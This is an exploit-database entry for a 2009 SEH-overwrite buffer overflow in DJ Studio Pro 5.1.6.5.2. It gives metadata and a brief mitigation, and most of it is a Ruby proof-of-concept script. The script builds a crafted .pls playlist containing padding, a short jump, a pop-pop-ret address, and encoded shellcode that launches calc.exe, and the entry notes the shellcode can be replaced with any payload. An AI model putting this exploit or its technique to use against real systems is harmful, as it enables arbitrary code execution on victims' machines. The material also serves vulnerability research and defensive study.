DJ Studio Pro 5.1.6.5.2 SEH Exploit

vendor:

DJ Studio Pro

by:

Sébastien Duquette

N/A

CVSS

HIGH

SEH Exploit

119

CWE

Product Name: DJ Studio Pro

Affected Version From: 5.1.6.5.2

Affected Version To: 5.1.6.5.2

Patch Exists: NO

Related CWE: CVE-2009-4656

CPE: None

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2009

DJ Studio Pro 5.1.6.5.2 SEH Exploit

This exploit allows an attacker to execute arbitrary code on a vulnerable system running DJ Studio Pro version 5.1.6.5.2. By exploiting a buffer overflow vulnerability, the attacker can overwrite the Structured Exception Handler (SEH) and gain control of the program's execution flow. This exploit specifically executes the calc.exe program, but it could be modified to execute any other malicious code.

Mitigation:

The vendor should release a patch or update to fix the buffer overflow vulnerability in DJ Studio Pro 5.1.6.5.2. Users should avoid opening untrusted media files or downloading content from untrusted sources to reduce the risk of exploitation.

Source

Exploit-DB raw data:

#!/usr/bin/ruby
# Exploit Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Date          : 2009-12-30
# Author        : Sébastien Duquette - ekse.0x@gmail.com
# Software Link : http://www.e-soft.co.uk/
# Version       : 5.1.6.5.2
# Tested on     : Windows XP SP2 En
# OSVDB ID      : 58159
# Overflow originally discovered by prodigy

# exec calc.exe
payload = 
"\xda\xdc\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x49\x6c\x48\x68\x4b\x39\x45\x50\x43\x30\x45" +
"\x50\x43\x50\x4d\x59\x48\x65\x46\x51\x4a\x72\x43\x54\x4e" +
"\x6b\x51\x42\x46\x50\x4c\x4b\x50\x52\x44\x4c\x4c\x4b\x51" +
"\x42\x47\x64\x4e\x6b\x44\x32\x51\x38\x46\x6f\x4f\x47\x42" +
"\x6a\x45\x76\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47" +
"\x4c\x45\x31\x51\x6c\x47\x72\x44\x6c\x51\x30\x4a\x61\x48" +
"\x4f\x44\x4d\x47\x71\x48\x47\x49\x72\x4a\x50\x43\x62\x43" +
"\x67\x4e\x6b\x51\x42\x46\x70\x4c\x4b\x51\x52\x45\x6c\x45" +
"\x51\x48\x50\x4c\x4b\x51\x50\x44\x38\x4c\x45\x4f\x30\x44" +
"\x34\x43\x7a\x46\x61\x48\x50\x46\x30\x4c\x4b\x47\x38\x45" +
"\x48\x4e\x6b\x51\x48\x45\x70\x46\x61\x48\x53\x4d\x33\x47" +
"\x4c\x47\x39\x4e\x6b\x47\x44\x4c\x4b\x46\x61\x4b\x66\x44" +
"\x71\x4b\x4f\x45\x61\x4b\x70\x4e\x4c\x4a\x61\x4a\x6f\x46" +
"\x6d\x45\x51\x4f\x37\x44\x78\x4b\x50\x44\x35\x48\x74\x45" +
"\x53\x43\x4d\x4a\x58\x47\x4b\x51\x6d\x47\x54\x51\x65\x49" +
"\x72\x51\x48\x4c\x4b\x46\x38\x51\x34\x47\x71\x48\x53\x51" +
"\x76\x4c\x4b\x46\x6c\x50\x4b\x4c\x4b\x43\x68\x45\x4c\x43" +
"\x31\x4a\x73\x4c\x4b\x44\x44\x4c\x4b\x43\x31\x4e\x30\x4d" +
"\x59\x43\x74\x45\x74\x44\x64\x51\x4b\x43\x6b\x51\x71\x51" +
"\x49\x42\x7a\x46\x31\x49\x6f\x4b\x50\x42\x78\x43\x6f\x51" +
"\x4a\x4e\x6b\x46\x72\x48\x6b\x4f\x76\x51\x4d\x51\x7a\x46" +
"\x61\x4c\x4d\x4b\x35\x48\x39\x47\x70\x45\x50\x45\x50\x42" +
"\x70\x45\x38\x46\x51\x4c\x4b\x50\x6f\x4b\x37\x49\x6f\x49" +
"\x45\x4f\x4b\x48\x70\x4c\x75\x4e\x42\x50\x56\x51\x78\x4f" +
"\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4b\x65\x47\x4c\x44" +
"\x46\x43\x4c\x46\x6a\x4f\x70\x49\x6b\x49\x70\x51\x65\x47" +
"\x75\x4d\x6b\x43\x77\x45\x43\x50\x72\x50\x6f\x42\x4a\x47" +
"\x70\x50\x53\x4b\x4f\x48\x55\x43\x53\x43\x51\x50\x6c\x42" +
"\x43\x44\x6e\x43\x55\x44\x38\x45\x35\x45\x50\x44\x4a\x41" +
"\x41"

pattern = File.open('pattern_5000.txt', 'r').read

f = File.open('boom.pls', 'w')
f.print 'A' * 1308
f.print "\xeb\x06\x90\x90"
f.print "\x2d\xc6\x4f\01"   # pop-pop-ret @ 0x014FC62D [djstudiopro.exe]
f.print payload
f.print 'A' * 10000

f.close